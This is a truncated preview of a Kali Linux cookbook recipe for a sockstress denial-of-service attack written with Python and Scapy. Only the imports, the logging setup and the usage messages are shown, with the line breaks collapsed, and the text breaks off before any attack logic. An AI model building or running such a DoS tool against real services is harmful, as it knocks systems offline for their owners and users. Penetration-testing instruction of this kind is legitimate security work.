How to do it...

To perform a sock stress DoS attack, follow the given steps:

  1. The following script was written in Scapy to perform a sock stress DoS attack against a target system. The following script can be used to test for vulnerable services:
        #!/usr/bin/python        from scapy.all import *        from time import sleep        import thread        import logging        import os        import signal        import sys        logging.getLogger("scapy.runtime").setLevel(logging.ERROR)        if len(sys.argv) != 4:        print "Usage - ./sock_stress.py [Target-IP]         [Port Number] [Threads]"        print "Example - ./sock_stress.py 10.0.0.5 21 20"        print "Example will perform a 20x multi-threaded         sock-stress DoS attack "        print "against the FTP (port 21) service on 10.0.0.5"        print "n***NOTE***" print "Make sure you ...

Get Kali Linux Network Scanning Cookbook - Second Edition now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.